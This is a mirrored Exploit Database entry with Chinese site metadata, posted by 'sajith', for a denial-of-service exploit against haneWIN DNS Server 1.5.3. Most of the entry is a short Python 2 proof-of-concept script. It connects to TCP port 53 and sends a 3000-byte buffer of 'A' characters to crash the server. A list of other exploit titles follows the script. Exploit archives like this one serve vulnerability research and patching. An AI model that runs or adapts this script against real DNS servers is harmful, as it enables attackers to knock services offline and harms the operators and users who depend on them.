haneWIN DNS Server 1.5.3 – Denial of Service

Exploit Database
11 阅读

作者： sajith

日期： 2014-01-17
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/31014/

###########################################################
[~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service
[~] Author: sajith
[~] version: haneWIN DNS Server 1.5.3
[~]Vendor Homepage: http://www.hanewin.net/
[~] vulnerable app link:http://www.hanewin.net/dns-e.htm
[~]Tested in windows Xp sp3
###########################################################
#POC by sajith shetty
import socket

target = "127.0.0.1"
port = 53

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
buf = "A" * 3000
request = buf
s.send(request)
data = s.recv(1024)
print data

except:

print "DNS server is Down!"

last Exploits
haneWIN DNS Server 1.5.3 – Denial of Service的更多信息

Sybase Advantage Data Architect – ‘.SQL’ Format Heap Overflow：
iOS/macOS – ‘task_swap_mach_voucher()’ Use-After-Free：
VideoLAN VLC Media Player 0.8.6i – ActiveX Denial of Service (PoC)：
Synchronet BBS 3.16c – Denial of Service：
OpenBSD 5.6 – Multiple Local Kernel Panics (Denial of Service)：
Adobe Flash TextField.sharpness Setter – Use-After-Free：
PHP 5.4.3 – ‘com_event_sink’ Denial of Service：
ArGoSoft Mini Mail Server 1.0.0.2 – Denial of Service：